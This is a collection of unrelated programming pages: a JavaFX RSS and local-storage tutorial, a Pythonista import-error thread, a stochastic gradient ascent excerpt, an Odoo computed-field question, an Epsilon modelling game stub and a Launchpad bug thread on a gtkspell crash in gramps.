                traverse($c);
            }
        }
    }

I do think that the expected behavior in the case that I raised is that namespace information is kept. For those who don't want it -- it would be nice to have a method that will cause the elt to "forget" its namespace information. What do you think about this? Thanks again for your help and rapid response. By the way, while we're talking about namespace support in XML::Twig -- please notice that there are unexpected #default namespaces attached to attributes when using the map_xmlns option to the new method. I think this is caused by XML::Parser::Expat. How can one avoid getting this #default and get the namespace (the URN) instead? I think that getting the URN for a default namespace makes more sense than getting #default.
Moreover, the #default is returned for attributes which have no default namespace according to the w3c recommendation. Why is that?
http://www.perlmonks.org/index.pl?node_id=624830
CC-MAIN-2014-23
refinedweb
599
68.7
Hi, I have a UDF that does most of the joins, and when I run it, it reads about 100-150 pages (from SQL Profiler), but if I wrap this UDF in an SP then the SP will read about 243,287 pages. Furthermore, the UDF itself performs an index seek but the SP performs an index scan on one of the searched columns. Can anyone please advise?

I have wrapped the default PasswordBox with my own PasswordBox code in order to be able to databind the SecurePassword property, as it does not have a dependency property on the default PasswordBox. Everything is going well except one thing: when I type text in the password box, the binding does not work and the password is not set in my ViewModel. I can see when my panel loads that the Password is being retrieved from my ViewModel, and I can also see that my PasswordBox's SecurePassword property setter is being called when I type in the password (so it calls SetValue(SecurePasswordProperty, value), etc.), it just does not make it to the ViewModel at this point. Any idea why this is working reading from the bound property but not writing to it? Here is my PasswordBox code:

    using System.ComponentModel;
    using System.Security;
    using System.Windows;
    using System.Windows.Controls;

    namespace MyNamespace
    {
        #region class PasswordBox
        /// <summary>
        /// Wraps the default <see cref="System.Windows.Controls.PasswordBox">PasswordBox</see> control
        /// to make the <see cref="SecurePassword">SecurePassword</see> property bindable.
        /// </summary>
        public partial class PasswordBox : UserControl
        {
            #region Dependency Properties
            public static readonly DependencyProperty SecureP

As I develop my SP site, it seems to get more and more complicated lol. OK, so I have two user controls that are in Smart Part 1.3 web parts. They are AJAX-enabled and everything works. The Parent and Child controls are both hopped-up GridViews. I want to be able to click the title (or some column in the row) and that will populate the other control.
I have looked at the ICellProvider stuff but I'm not sure if that would work, considering I'm using controls and not building actual web parts. What I have in mind is a CAML version of this: display all columns where Title = "whatever was just clicked in the parent". Feasible?
http://www.dotnetspark.com/links/36697-udf-wrapped-sp.aspx
CC-MAIN-2017-22
refinedweb
398
63.19
CDK for Terraform (CDKTF) allows you to define your infrastructure in a familiar programming language such as TypeScript, Python, or Go. In this tutorial, you will provision an EC2 instance on AWS using TypeScript. This tutorial is also available in Python and Go editions. If you do not have CDKTF installed on your system, follow the steps in the install CDKTF tutorial to install it before you continue with this tutorial.

»Prerequisites

To follow this tutorial, you need the following installed locally:

- Terraform v0.15+
- CDK for Terraform
- Node.js v12.16+
- an AWS account and AWS Access Credentials

Terraform and CDKTF will use credentials set in your environment or through other means as described in the Terraform documentation. Add your AWS credentials as two environment variables.

- Set your AWS_ACCESS_KEY_ID, replacing AAAAAA with your AWS Access Key ID.

    $ export AWS_ACCESS_KEY_ID=AAAAAA

- Set your AWS_SECRET_ACCESS_KEY, replacing AAAAAA with your AWS Secret Access Key.

    $ export AWS_SECRET_ACCESS_KEY=AAAAAA

»Initialize a new CDK for Terraform application

Start by creating a directory named learn-cdktf-typescript for the project.

    $ mkdir learn-cdktf-typescript

Then navigate into it.

    $ cd learn-cdktf-typescript

Inside the directory, run cdktf init with the TypeScript template. Use --local to store Terraform's state file on your machine instead of remotely in Terraform Cloud.

    $ cdktf init --template="typescript" --local
    Project Name: (default: 'learn-cdktf-typescript')
    Project Description: (default: 'A simple getting started project for cdktf.')
    ## ...

This will initialize a brand new CDK for Terraform project in TypeScript using an interactive command. Accept the defaults when prompted.

»Add AWS provider

Open cdktf.json in your text editor, and add aws as one of the Terraform providers that you use in the application.
      {
        "language": "typescript",
        "app": "npm run --silent compile && node main.js",
    -   "terraformProviders": [],
    +   "terraformProviders": [
    +     "hashicorp/aws@~> 3.42"
    +   ],
        "terraformModules": [],
        "context": {
          "excludeStackIdFromLogicalIds": "true",
          "allowSepCharsInLogicalIds": "true"
        }
      }

Run cdktf get to install the AWS provider you added to cdktf.json.

    $ cdktf get
    Generated typescript constructs in the output directory: .gen

»Define your CDK for Terraform Application

Open the main.ts file to view your application code. The template creates a scaffold with no functionality. Replace the contents of main.ts with the following code snippet. This new TypeScript application uses the CDK to provision an EC2 instance in us-west-1.

    import { Construct } from 'constructs'
    import { App, TerraformStack, TerraformOutput } from 'cdktf'
    import { AwsProvider, Instance } from './.gen/providers/aws'

    class MyStack extends TerraformStack {
      constructor(scope: Construct, id: string) {
        super(scope, id)

        new AwsProvider(this, 'aws', {
          region: 'us-west-1',
        })

        const instance = new Instance(this, 'compute', {
          ami: 'ami-01456a894f71116f2',
          instanceType: 't2.micro',
        })

        new TerraformOutput(this, 'public_ip', {
          value: instance.publicIp,
        })
      }
    }

    const app = new App()
    new MyStack(app, 'typescript-aws')
    app.synth()

»Examine the code

Most of the code is similar to concepts you've already seen.

    import { App, TerraformStack, TerraformOutput } from 'cdktf'

Tip: If you are using an IDE like Visual Studio Code with IntelliSense, you can start typing "Terraform" inside the curly braces and you'll find a list of available objects. The core Terraform classes are in the cdktf library and work with IntelliSense. You must explicitly import the AWS provider and other resources before you use them. In this case you will need the AwsProvider and Instance classes for your compute resource.

    import { AwsProvider, Instance } from './.gen/providers/aws'

Next, the example code defines a new stack, which contains code to define your provider and all of your resources.

    class MyStack extends TerraformStack {
      constructor(scope: Construct, id: string) {
        super(scope, id)

Next, the code configures the AWS provider.

    new AwsProvider(this, 'aws', {
      region: 'us-west-1',
    })

You can configure the AwsProvider by passing in an object with keys and values that map to Terraform arguments as listed in the provider API.
In the snippet below, the region key is set to us-west-1.

TIP: One way to discover all the classes and properties for a provider is to examine the .gen/providers/aws directory. You'll find files such as aws-provider.ts which list the exact class names and properties for each resource.

Next, the code defines a compute instance with the Instance class.

    const instance = new Instance(this, 'compute', {
      ami: 'ami-01456a894f71116f2',
      instanceType: 't2.micro',
    })

The instance is also configured with an object, using camel case for properties that correspond to the Terraform API. If you want to reference a resource, you must store the resource in a variable. In this example, since the TerraformOutput below uses the instance's publicIp attribute, the code stores the instance in a variable named instance. The public_ip output references the instance variable to return the instance's public IP address.

    new TerraformOutput(this, 'public_ip', {
      value: instance.publicIp,
    })

Terraform outputs allow you to share values between Terraform workspaces. When writing this code, you can use IntelliSense to view all the properties of the instance variable. In this case, publicIp is the only one that is used.

»Provision infrastructure

Now that you have initialized the project with the AWS provider and written code to provision an instance, it's time to deploy it by running cdktf deploy. Remember to confirm the deploy with a yes.

    $ cdktf deploy
    Deploying Stack: typescript-aws
    Resources
     ✔ AWS_INSTANCE compute aws_instance.compute

    Summary: 1 created, 0 updated, 0 destroyed.

    Output: public_ip = 50.18.17.102

The cdktf deploy command runs terraform apply in the background. If you are using local storage mode, the command creates a terraform.tfstate file in the root of the project. After the instance is created, visit the AWS EC2 Dashboard. Notice that the CDK's deploy output (public_ip) matches the instance's public IPv4 address.
»Change infrastructure by adding the Name tag

Add a tag to the EC2 instance. Update the Instance in main.ts to the following.

      const instance = new Instance(this, 'compute', {
        ami: 'ami-01456a894f71116f2',
        instanceType: 't2.micro',
    +   tags: {
    +     Name: 'TypeScript-Demo',
    +   },
      })

Deploy your updated application. Remember to confirm your run with a yes.

    $ cdktf deploy
    Deploying Stack: typescript-aws
    Resources
     ✔ AWS_INSTANCE compute aws_instance.compute

    Summary: 0 created, 1 updated, 0 destroyed.

    Output: public_ip = 50.18.17.102

»Clean up your infrastructure

Destroy the application by running cdktf destroy. Remember to confirm your run with a yes.

    $ cdktf destroy
    Destroying Stack: typescript-aws
    Resources
     ✔ AWS_INSTANCE compute aws_instance.compute

    Summary: 1 destroyed.

»Next steps

Congrats, you deployed, modified, and deleted an AWS EC2 instance using CDKTF! CDKTF is capable of much more. For example, you can:

- Use the cdktf synth command to generate JSON which can be used by the standard terraform executable to provision infrastructure using terraform apply and other Terraform commands.
- Use any Terraform provider by adding it to terraformProviders in cdktf.json and running cdktf get.
- Use TypeScript language features (like class inheritance) or data from other sources to augment your Terraform configuration.
- Use CDKTF with Terraform Cloud for persistent storage of your state file and for team collaboration.

For other examples, refer to the documentation in the terraform-cdk repository. In particular, check out the:

- Getting started guides.
- Feature documentation.
- Example code in several programming languages.
https://learn.hashicorp.com/tutorials/terraform/cdktf-build
CC-MAIN-2021-39
refinedweb
1,097
51.14
FMIN(3P)                 POSIX Programmer's Manual                 FMIN(3P)

This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.

fmin, fminf, fminl — determine minimum numeric value of two floating-point numbers

    #include <math.h>

    double fmin(double x, double y);
    float fminf(float x, float y);
    long double fminl(long double x, long double y);

The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1‐2008 defers to the ISO C standard.

See also: fdim(3p), fmax(3p)

Pages that refer to this page: math.h(0p), fdim(3p), fmax(3p)
http://man7.org/linux/man-pages/man3/fmin.3p.html
CC-MAIN-2017-43
refinedweb
139
57.57
First, I would download a free copy of OpenOffice 3.0, which supports the creation of PDF files. Create a new file using Writer. Next, I would export each GSP document in Enhanced Windows Metafile (EMF) format, which preserves the dimensions of the graphics produced by GSP. When you import the GSP document into OpenOffice Writer (Import Picture), you have the option of importing the entire graphic, or only a link to the graphic. When printing or viewing, the link will open the graphic. Insert your Word documents into the Writer file using Insert, File. Since OpenOffice supports the creation of PDFs, you do not need to go to another program for this conversion.
http://mathforum.org/mathtools/discuss.html?context=dtype&do=r&msg=79114
CC-MAIN-2017-26
refinedweb
114
65.62
What is the size limitation of the NVM storage in the pycom module? What is the size limitation of the nvs functions? Is it not possible to return the amount that is still free?

    pycom.nvs_set(key, value)
    pycom.nvs_get(key)

I do not know, but it may depend on the firmware version. Also no idea whether stored data survives a firmware update or not. I'm missing methods:

- get number of total/used indexes
- get list of keys

Also there are some smaller issues with retrieving data with non-existing keys, etc.

Well, no answer since 3 months. I have tried it myself and filled the LoPy by running:

    import pycom
    pycom.nvs_erase_all()
    ii = 0
    while True:
        try:
            print(ii)
            pycom.nvs_set('loc' + str(ii), ii)
            ii += 1
        except OSError as err:
            print(err, ii - 1)
            break

It will run and exit with "No space available 613", so locations 0-613 can be used. Every location is filled with its "index number".

    pycom.nvs_get('loc614') will return None
    pycom.nvs_get('loc613') will return 613
    pycom.nvs_get('loc612') will return 612, etc.

UPDATING any location:

    pycom.nvs_set('loc612', 0x55aa)

will return the error "OSError: no space available".

Removing a single entry:

    pycom.nvs_erase('loc613')

If it does not exist, the error "KeyError: key not found" is returned. Then when you store the value again:

    pycom.nvs_set('loc613', 0x55aa)

But when doing it again you end up with the "OSError: no space available".

So there are 614 locations available where you can store a 32-bit value. There seems to be a BUG when UPDATING an EXISTING parameter when the storage is filled to the maximum, so there is possibly a wrong offset (range) that only becomes visible when all of the memory is used. It would be a nice feature to know the begin and end of the flash "NVM" storage space to calculate a checksum to see if there is no corruption of the flash. Also a function to get a list of all the names of the parameters would be nice.
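One way to cope with the unpredictable "no space available" failures described above is to wrap nvs_set in a guard that reports failure instead of raising. This is an illustrative sketch, not Pycom-provided code; the setter function is passed in as a parameter so the helper can be exercised off-device (on a real board you would pass pycom.nvs_set):

```python
def safe_nvs_set(nvs_set, key, value):
    # Try to persist 'value' under 'key'; return True on success and
    # False when the NVS store raises OSError (e.g. "no space available"),
    # so callers can free a slot with nvs_erase and retry instead of crashing.
    try:
        nvs_set(key, value)
        return True
    except OSError:
        return False
```

On-device usage would then look like `safe_nvs_set(pycom.nvs_set, 'loc0', 42)`.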
https://forum.pycom.io/topic/1720/what-is-the-size-limitation-of-the-nvm-storage-in-module-pycom
CC-MAIN-2019-09
refinedweb
337
66.44
I develop Cursive, a plugin for Clojure development. I'd like to implement better support for ClojureScript in Cursive; ClojureScript is the dialect of Clojure which compiles to JavaScript. I've looked around but there's very little information on how to provide support for compile-to-JS languages, and most of the current implementations seem to assume a fairly similar syntax to JS. ClojureScript's is very different, and I can't extend my PSI elements from JSExpression, JSStatement and friends. Here are some examples of things I need to support:

The js prefix allows access to the global object.

    (js/parseInt "222")

Object constructor calls.

    (js/RegExp. "^foo$")

Instance method invocations.

    (def re (js/RegExp. "^Clojure"))
    (.test re "ClojureScript")

Static method invocations.

    (.sqrt js/Math 2)
    ;; or
    (js/Math.sqrt 2)

Object property access.

    (.-multiline re)
    (.-PI js/Math)

Simple JS object creation:

    (js-obj "country" "FR")
    ;; or
    (def myobj #js {:country "FR"})

(similar to)

    var myobj = {country: "FR"};

And then...

    (.-country myobj)

Construction of JS objects from Clojure data:

    (clj->js {:foo {:bar "baz"}})
    (into-array ["France" "Korea" "Peru"])

ClojureScript compiles down to Google Closure compatible JavaScript, and then runs it through the Closure compiler afterwards. So Google Closure interop is very important:

    (ns yourapp.core
      (:require [goog.dom :as dom]))

    (def element (dom/getElement "body"))

    (ns yourapp.core
      (:import goog.History))

    (def instance (History.))

There is also syntax for integrating Node modules (here :refer imports a symbol directly):

    (ns example.core
      (:require [react :refer [createElement]]
                ["react-dom/server" :as ReactDOMServer :refer [renderToString]]))

    (js/console.log (renderToString (createElement "div" nil "Hello World!")))

I'd love some guidance on how to implement symbol resolution and code completion for the above use cases, as well as how to provide the JS integration with information about the JS objects created in CLJS code.
Can I make calls like "what are the elements available on the global object/an object of this type/some Closure namespace/some node module" and "what are all the available Node modules for this file"? I'd also really love to be able to leverage the type inference and dataflow features. From what I've seen, they require my PSI to extend JSStatement/JSExpression and so on - is that the case? If so, can I get information about types from the existing JS indexes to provide some of that functionality myself? Are the types compatible between native JavaScript, Closure and TypeScript, or do I have to convert them somehow? In ClojureScript, the native types (string, number, regex, nil) etc. compile to their JavaScript equivalents. I know this is a question with probably a massive answer, so many thanks for any and all guidance.

Colin, it is indeed a non-trivial question. First of all, I think that you might need to either replace the Clojure AST with a JS-compatible one, or you can try using MultiplePsiFilesPerDocumentFileViewProvider with a secondary JS-compatible AST. I think you should be able to create an AST for Clojure based on JSElement. I would suggest getting a proof of concept where you can resolve references from ClojureScript to JS/TS and vice versa, and then experiment with multiple PsiFiles. Once you have a JS-compatible model available you can look for some answers in our open-source plugins - the Angular and Vue plugins, which implement their own JS-like expression support (e.g. custom resolution and code completion). I'll be glad to assist you!

Hi Piotr, there are various complications with creating a JS-compatible AST. In general, when parsing Clojure code I only create a very simple AST. This is because Clojure, as a lisp, is very macro-focused. Even the majority of the built-in features (defn for defining functions, for example) are based on macros. This means that I need symbol resolution in order to build the AST, and I can't do it during parsing.
An additional complication is that users can define their own macros, so this needs to be extensible - see for how this works from the user's perspective. So what I do is only create a very simple AST during parsing which basically just contains the data structures in the source (symbols, keywords, strings, lists, vectors, maps etc.) and then I lazily parse the forms when required for editor functionality. The other complication is CLJC, which is similar to a template language for sharing code between Clojure and ClojureScript. You can get an idea of what this looks like here: . My support for CLJC is actually very messy at the moment, and I wonder if MultiplePsiFilesPerDocumentFileViewProvider might provide a cleaner solution (i.e. I could create a Clojure and a ClojureScript PSI from a CLJC file). So I think that creating a JS-compatible AST is probably pretty tricky. Is it possible to get much functionality without this?

Colin, I've looked a little bit at the syntax and I think you should be able to build a JS-compatible syntax tree which would work with our resolution engine. However, there are a lot of "ifs" and I am not really into Clojure myself, so I think it would be better to schedule a call to discuss possible solutions. Please ping me on my corporate e-mail - piotr dot tomiak at jetbrains dot com.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/360006794859-Implementing-JavaScript-interop-for-a-compile-to-JS-language
CC-MAIN-2021-39
refinedweb
878
55.44
    #include <stdlib.h>

    int rand( void );

This function returns a pseudorandom integer in the range 0 to RAND_MAX (a macro defined in stdlib.h). See also: srand(). Back to Essential C Functions.

    Xn = (1103515245 * Xn-1 + 12345) mod RAND_MAX

Assume that when you seed this, the seed = X0.

Microsoft C

This is the PRNG in the MS C library version 4.0. It returns an integer in the range 0 to 32767 inclusive.

    TEMP = (214013 * Xn-1 + 2531011) mod 2147483648
    Xn = INT(TEMP / 65536)

Note that neither ANSI nor POSIX require that a specific algorithm be used by rand(). Generally the only restriction on it is that, within a single process, rand() will always return the same sequence of numbers after it is seeded with srand() using the same seed. For example, the GNU C library, glibc, uses (to quote the man page) "a non-linear additive feedback" generator, which is very unlike the linear congruential PRNGs used by many other C libraries. The primary reason for this is that, while an LCRNG is easy to code, the lower-order bits are often very unevenly distributed. In fact, you will note in DrT's writeup in this same node that Microsoft's LCRNG shifts the intermediate result over by 16 bits, giving better bit distributions in the lower part of the return value. You can't even assume that the return values of rand() will stay the same from one run of your program to the next, because in the presence of shared libraries, it's entirely possible that someone could upgrade the library, and it will have changed the RNG algorithm used. It's a common mistake to assume that the return values of rand() are portable. The function, itself, is a useful and portable tool, but don't try to give it semantics that it does not have, and are not defined by any standard.
Take a look at this nice short C program:

    #include <stdio.h>
    #include <stdlib.h>

    int main()
    {
        srand(5);
        printf("%d\n", rand());
        return 0;
    }

The result of running this on a sampling of systems:

    Linux (glibc 2.2):         590011675
    Solaris 2.6 and IRIX 6.5:  18655
    MacOS X:                   1222621274
https://everything2.com/title/rand%2528%2529
CC-MAIN-2018-34
refinedweb
384
69.21
exit, atexit, _exit - Terminates a process

Standard C Library (libc.so, libc.a)

    #include <stdlib.h>

    int atexit(
        void (*function) (void));

    void exit(
        int status);

    #include <unistd.h>

    void _exit(
        int status);

Interfaces documented on this reference page conform to industry standards as follows: exit(): ISO C, XPG4, XPG4-UNIX; atexit(), _exit(): XPG4, XPG4-UNIX. Refer to the standards(5) reference page for more information about industry standards and associated tags.

status
    Indicates the status of the process.
function
    Points to a function that is called at normal process termination for cleanup processing. The number of exit handlers that can be specified with the atexit() function is limited by the amount of available virtual memory.

The atexit() function registers functions to be called at normal process termination for cleanup processing. The function adds a single exit handler to a list of handlers to be called at process termination. The system calls the functions in reverse order, calling the function at the top of the list first. Any function that is registered more than once will be repeated.

The exit() function terminates the calling process after calling the _cleanup() function to flush any buffered output. Then it calls any functions registered previously for the process by the atexit() function, in the reverse order to that in which they were registered. In addition, the exit() function flushes all open output streams, closes all open streams, and removes all files created by the tmpfile() function. Finally, it calls the _exit() function, which completes process termination and does not return.

The _exit() and exit() functions terminate the calling process and cause the following to occur:

- All of the file descriptors and directory streams open in the calling process are closed. Since the exit() function terminates the process, any errors encountered during these close operations go unreported.
- Message catalog descriptors and conversion descriptors opened in the calling process are also closed with no reporting of errors.
- The parent process ID of all the calling process' existing child processes and zombie processes is reset. The child processes continue executing; however, their parent process ID is set to the process ID of init. The init process thus adopts each of these processes, catches the SIGCHLD signals that they generate, and calls the wait() function for each of them.
- If the parent process of the calling process is running a wait() or waitpid() function, that parent process is notified that the calling process is being terminated. The low-order 8 bits (that is, bits 0377 or 0xFF) of the status parameter are made available to the parent process.

[Digital] If a thread calls the _exit() function, the entire process exits and all threads within the process are terminated.

[XPG4-UNIX] An application should call sysconf() to obtain the value of {ATEXIT_MAX}, the number of handlers that can be registered. There is no way for an application to tell how many functions have already been registered with atexit(). To prematurely terminate atexit handler processing from within a handler, _exit() can be called. It is not recommended to call exit() from within an atexit handler.

The exit() function and _exit() function do not return. The atexit() function returns 0 (zero) if successful. The function fails if an application attempts to register more process cleanup functions than available virtual memory allows. In this case, the function returns a nonzero value.

Functions: acct(2), sigaction(2), sigvec(2), wait(2), ldr_atexit(3), times(3)

Standards: standards(5)
http://backdrift.org/man/tru64/man2/exit.2.html
CC-MAIN-2017-09
refinedweb
579
54.22
Each of these examples takes an ASIN, builds the proper URL, grabs the image, and saves it locally as [ASIN].jpg.

This uses the getstore( ) function of LWP::Simple to request and save the file. $rp is the return code, and to shore this function up you could take additional action if it's equal to 404.

    use LWP::Simple;

    $Asin = "0596004478";
    $rp = getstore("", "$Asin.jpg");

Writing binary files like images isn't quite as straightforward with VBScript, so you have to turn to some unusual components. The ServerXMLHTTP component makes the request, which is written to an ADODB stream. The ADODB component has the ability to write binary files.

    strASIN = "0596004478"
    strURL = "" & strASIN & _
             ".01.MZZZZZZZ.jpg"
    strFile = strASIN & ".jpg"

    'Get the Image
    Set xmlhttp = CreateObject("Msxml2.SERVERXMLHTTP")
    xmlhttp.Open "GET", strURL, false
    xmlhttp.Send(Now)

    'Create a Stream
    Set adodbStream = CreateObject("ADODB.Stream")

    'Open the stream
    adodbStream.Open
    adodbStream.Type = 1 'adTypeBinary
    adodbStream.Write xmlhttp.responseBody
    adodbStream.SaveToFile strFile, 2 'adSaveCreateOverWrite
    adodbStream.Close

    Set adodbStream = Nothing
    Set xmlhttp = Nothing

This code will run as a WSH file. Simply add Server. before the CreateObject commands to use this code in an ASP file.

The key to this PHP code is setting the fopen( ) function to read and write binary files. Note the rb (read binary) and wb (write binary) options.

    $asin = "0596004478";
    $url = "".$asin.".01.MZZZZZZZ.jpg";
    $filedata = "";
    $remoteimage = fopen($url, 'rb');
    if ($remoteimage) {
        while (!feof($remoteimage)) {
            $filedata .= fread($remoteimage, 1024);
        }
    }
    fclose($remoteimage);
    $localimage = fopen($asin.".jpg", 'wb');
    fwrite($localimage, $filedata);
    fclose($localimage);

As with PHP, be sure to set the file open command to wb (write binary) so it can save the file properly.
import urllib

asin = "0596004478"
url = '' + asin + ".01.MZZZZZZZ.jpg"
filedata = urllib.urlopen(url).read()
f = open(asin + '.jpg', 'wb')
f.write(filedata)
f.close()
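The Python example above uses the Python 2 urllib module, which no longer exists in Python 3. A Python 3 equivalent might look like the sketch below; note that BASE_URL is a placeholder (the image-URL prefix did not survive in the text above), and save_image is a function name of my choosing, not from the article.

```python
from urllib.request import urlopen

# BASE_URL is a placeholder: fill in the image-URL prefix from the
# original hack before using this against the real service.
BASE_URL = ""

def save_image(asin, base_url=BASE_URL, out_path=None):
    """Fetch base_url + asin + '.01.MZZZZZZZ.jpg' and save it as [asin].jpg."""
    url = base_url + asin + ".01.MZZZZZZZ.jpg"
    data = urlopen(url).read()
    out_path = out_path or (asin + ".jpg")
    with open(out_path, "wb") as f:
        f.write(data)
    return out_path
```

Because urlopen() also accepts file:// URLs, the function can be exercised locally without touching the network.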
http://oreilly.com/pub/h/477#code
Opened 3 years ago Closed 3 years ago Last modified 3 years ago #5315 closed change (fixed) Add support for Microsoft Edge Description (last modified by oleksandr) Background We have a version of ABP for Microsoft Edge under the edge bookmark currently. With Windows 10 Creators Update, the amount of Edge-specific changes is quite minimal, so we can drop the bookmark and just operate from one version of platform code. What to change Move the necessary changes from the edge bookmark to master. Hints for testers The changes for this ticket touched the following code paths, so it would be preferable to test them:
- We are overriding the core namespace for extensions API. So please make sure that basic functionality like popup page population, localization of options page works.
- We have changed the way detection of default language works. So please make sure the correct subscription is selected for a language, options page is in correct language, and that left-to-right and right-to-left languages are working fine.
- We have changed how options page is being opened. Please make sure both options page and first run page can be opened as expected.
- We have touched the code that deals with our WebSocket wrapper, so checking if WebSocket blocking works would be great. It would also be worth checking that the OBJECT and OBJECT_SUBREQUEST filter types work fine.
Change History (14) comment:1 Changed 3 years ago by oleksandr comment:2 Changed 3 years ago by kzar comment:3 Changed 3 years ago by abpbot comment:4 Changed 3 years ago by kzar So most fixes have made it into master with the above commit. Ollie's now looking into the storage workaround; when he's done, we'll either rebase the IndexDB commit or come up with a different workaround and push that to the edge bookmark.
comment:5 Changed 3 years ago by oleksandr - Resolution set to fixed - Status changed from reviewing to closed comment:6 Changed 3 years ago by kzar - Resolution fixed deleted - Status changed from closed to reopened I think this issue should remain open until the edge branch is no longer necessary at all. We're nearly there, but not quite. comment:7 Changed 3 years ago by sebastian comment:8 Changed 3 years ago by kzar comment:9 Changed 3 years ago by sebastian - Milestone set to Adblock-Plus-for-Chrome-Opera-next comment:10 Changed 3 years ago by sebastian I suppose this issue can be closed now? But how about adding a "Hints for testers" section, highlighting the changed code paths which need to be tested on Chrome/Opera as well, in order to make sure that we didn't introduce any bugs there? comment:11 Changed 3 years ago by kzar Well don't we still need the edge branch for the storage workaround? IMO we shouldn't close this issue until that's no longer the case. comment:12 Changed 3 years ago by sebastian Well, if this issue is supposed to be a meta issue (IMO we don't need one) for everything Microsoft Edge until we abandon the edge bookmark, then there has to be a separate issue for the changes merged upstream, so that this code gets tested. comment:13 Changed 3 years ago by oleksandr comment:14 Changed 3 years ago by Ross - Tester changed from Unknown to Ross - Verified working set Child tickets verified. Localization, right-to-left text, options page opening, websocket/object/subrequest work as expected. ABP 0.9.11.1849 Edge 40 / Windows 10 ABP 1.13.3.1838 Chrome 49 / 61 / Windows 10 Opera 36 / 47 / Windows 10 ABP 2.99.0.1838beta Firefox 53 / 55 / Windows 10 A commit referencing this issue has landed: Issue 5315 - Add support for Microsoft Edge
https://issues.adblockplus.org/ticket/5315
Inside the Mind of Your Potential Early Stage Investor. There are many different approaches taken to both vetting and valuing an early stage startup company (with high growth aspirations). I wanted to share a few of them to give you a picture of what that VC you are hoping to talk to might be thinking about. Hopefully this will help you empathize with their perspective and understand what might be going through their mind when considering your company. VETTING: Typically, an investor (or investment firm) will have some thesis or lens through which they view the world of investments available to them. This is often a function of their own experience in certain industries, people they have worked with before, past investment data, etc. A few examples might be: - “We invest in B2B companies in XYZ industries with a revenue run rate over $ABC” - “We only invest in consumer software and place a high emphasis on customer validation” - “We are most focused on the founding team and look for a total addressable market over $ABC” - “We are social impact investors and care about social good” Each investor may have their own answer to the question above and usually they are happy to share this information. There are definitely people who invest more opportunistically and don’t stick as dogmatically to such specific criteria. The second piece of the puzzle which works in conjunction with the criteria listed above is the risk-reward profile the investor is interested in. This can vary greatly from angel investors to VCs at different stages of the company life cycle. Many early-stage investors are most interested in “home runs” (ie a Facebook, Uber, Snapchat, Dropbox, etc) and are willing to place bets that are to some degree binary. These companies need to have the potential to grow VERY fast and have access to a large addressable market. 
To quantify this, they are not looking for companies that are likely to give them a 5x return (over a few years), but are more interested in ones that provide a 100x+ return even if that means a greater risk of company failure. Of course, this is not universally true. There are other investors who are more interested in higher-probability "doubles" or "triples" and may not be willing to take huge risks on consumer applications that are much less predictable than the types of companies they invest in. They may be more focused on current revenues or sales process, etc. I would say there are two universal areas of interest for most investors:
- The Team. If they don't trust the people, it ain't happening.
- The Customer. If they can't see very clear value to a customer, then it's unlikely the company will receive investment. Some investors even insist on interviewing a large set of customers as part of their diligence process (which makes a lot of sense to me).
The nuts and bolts of "vetting a company" once investor interest has been expressed would mostly be verifying that all the information that has been shared is true (financial, user analytics, etc) and that the technology is real. NOTE: This answer is very generalized and the investment parameters can vary greatly from investor to investor, so my best advice is to ask them directly. VALUING: This is definitely more art than science. There are a few key considerations, but beyond that, it's very hard to place a value on something that is more "potential" than "realization" (if we are talking early stage companies). The main considerations tend to be:
- Market comps — In cities with a lot of venture investing, there tend to be widely accepted ranges. This simplifies the process because it brings some level of uniformity to a highly uncertain question and narrows the discussion.
- Investment vehicle — It's very common for early-stage investors to use a SAFE or convertible note because that allows them to punt the valuation question down the road to some degree (rather than a priced equity round where a valuation is explicitly stated).
- Competition for access — If a company has a lot of prospective investors who are interested, not all of them will get to participate. This will cause the investors who most badly want to be included to improve their terms.
- Investor goals — If an investor is looking for companies that can one day be worth a billion dollars, they may not be as concerned about whether the valuation at a very early stage is 3MM or 5MM. They will be more concerned about keeping the founders motivated. If it's a different type of investor with different goals, they may be stricter on the valuation.
- Founder motivation — I mentioned this before, but I'll say it again because it's important. If you are investing in a business, you need the people in charge of it to be motivated. If an investor cranks the valuation down too much (and still manages to get a deal), there is a very real concern that the founders will be much more comfortable walking away if things get tough.
More explicitly, from founders I have spoken to, the early-stage SAFE/convertible note cap range tends to be in the neighborhood of $2MM-8MM. Even though there aren't really great methods for determining these numbers, you should still be prepared to defend whatever you decide. The most common methods I have seen are:
- Accept what is the market in your area (as noted above).
- Use an expected value or DCF approach; to do this you would probably make a financial model going a few years out and then assign odds of reaching various performance levels in your model.
Do research and make assumptions on how companies in your space are valued (ie what business metric drives their value) and then calculate a valuation for your company at each performance level in your model. Multiply each valuation by your estimated odds of reaching that level. Sum the results, and you have an expected value approximation that is at least somewhat rooted in logic (hopefully). - Start out at $6–8MM and then adjust based on how aggressively you are rejected (this is a pretty half-assed way to do it, but we live in a crazy world).
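To make the expected-value method above concrete, here is a small sketch with entirely made-up numbers: three performance scenarios, an estimated probability for each, and an assumed revenue multiple for the space. Every figure is hypothetical and exists only to show the arithmetic.

```python
# Assumption: comparable companies in the space trade at ~5x revenue.
REVENUE_MULTIPLE = 5.0

scenarios = [
    # (probability of reaching this level, projected year-3 revenue in $MM)
    (0.60, 0.0),   # company fails
    (0.30, 2.0),   # modest traction
    (0.10, 15.0),  # breakout case
]

def expected_valuation(scenarios, multiple):
    """Probability-weighted sum of scenario valuations (revenue * multiple)."""
    assert abs(sum(p for p, _ in scenarios) - 1.0) < 1e-9  # odds must sum to 1
    return sum(p * revenue * multiple for p, revenue in scenarios)

print(round(expected_valuation(scenarios, REVENUE_MULTIPLE), 2))  # → 10.5
```

With these made-up odds the expected value lands around $10.5MM; the point is the mechanics, not the number.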
https://charlielambro.medium.com/a-guide-to-how-investors-will-vet-and-value-your-startup-29f9fc337056?responsesOpen=true&source=---------8----------------------------
